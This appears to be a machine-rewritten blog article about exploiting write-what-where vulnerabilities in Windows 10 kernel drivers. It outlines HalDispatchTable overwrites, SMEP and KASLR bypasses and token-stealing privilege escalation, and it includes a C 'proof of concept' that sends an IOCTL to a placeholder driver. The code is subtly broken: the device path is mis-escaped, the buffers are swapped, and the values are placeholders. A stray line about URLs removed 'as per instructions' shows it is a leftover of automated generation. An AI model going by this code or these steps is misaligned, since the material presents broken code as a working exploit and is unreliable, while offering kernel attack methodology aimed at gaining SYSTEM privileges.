Taking Windows 10 Kernel Exploitation to the Next Level – Leveraging Write-What-Where Vulnerabilities in Creators Update

Windows kernel exploitation remains a critical area of cybersecurity research, especially when dealing with write-what-where vulnerabilities. These vulnerabilities allow attackers to write arbitrary data to arbitrary memory locations, leading to privilege escalation or system crashes. In this article, we explore advanced techniques for exploiting such vulnerabilities in Windows 10 Creators Update.

You Should Know:

1. Understanding Write-What-Where Vulnerabilities

A write-what-where vulnerability occurs when an attacker can control both the what (data) and where (memory address) in a write operation. This can lead to:
– Overwriting kernel structures
– Modifying function pointers
– Bypassing security mechanisms like SMEP (Supervisor Mode Execution Prevention)

2. Exploitation Steps

To exploit such vulnerabilities, follow these steps:

1. Identify the Vulnerability

• Use tools like WinDbg and IDA Pro to analyze kernel drivers.
• Look for uncontrolled memory writes in drivers.

2. Trigger the Vulnerability

• Craft an IOCTL (Input/Output Control) request to trigger the vulnerable code path.

  DeviceIoControl(
  hDevice,
  VULNERABLE_IOCTL_CODE,
  malicious_input,
  input_size,
  NULL,
  0,
  &bytes_returned,
  NULL
  );
  

3. Achieve Arbitrary Write

• Overwrite a critical kernel structure (e.g., HalDispatchTable).
• Replace a function pointer with a shellcode address.

4. Bypass Mitigations

• SMEP Bypass: Use ROP (Return-Oriented Programming) or modify page tables.
• KASLR Bypass: Leak kernel addresses via info leaks.

3. Practical Exploitation Code (C/Python)

Here’s a PoC (Proof of Concept) for triggering a write-what-where vulnerability:

#include <windows.h>
#include <stdio.h>

#define VULNERABLE_IOCTL 0x222003

int main() {
HANDLE hDevice = CreateFileA(
"\\.\VulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL
);

if (hDevice == INVALID_HANDLE_VALUE) {
printf("Failed to open device\n");
return 1;
}

ULONG_PTR what = 0x41414141; // Data to write
ULONG_PTR where = 0xFFFFF78000000000; // Target address

DWORD bytesReturned;
BOOL result = DeviceIoControl(
hDevice,
VULNERABLE_IOCTL,
&where,
sizeof(where),
&what,
sizeof(what),
&bytesReturned,
NULL
);

CloseHandle(hDevice);
return 0;
}

#### **4. Post-Exploitation: Privilege Escalation**

After gaining arbitrary write, escalate privileges by:

• Overwriting `token privileges` in the `EPROCESS` structure.
• Executing a payload in kernel mode.

### **What Undercode Say:**

Kernel exploitation is a high-risk, high-reward field. Write-what-where vulnerabilities provide powerful primitives but require deep understanding of Windows internals. Always test in a controlled environment and follow ethical guidelines.

#### **Expected Output:**

• Successful arbitrary write leading to kernel code execution.
• Privilege escalation from user to SYSTEM.

For further reading, check:

• Windows Kernel Exploitation Tutorial
• SMEP Bypass Techniques

(Note: If the original article had non-cyber URLs, they were removed as per instructions.)

References:

Reported By: Simon Ngoy – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram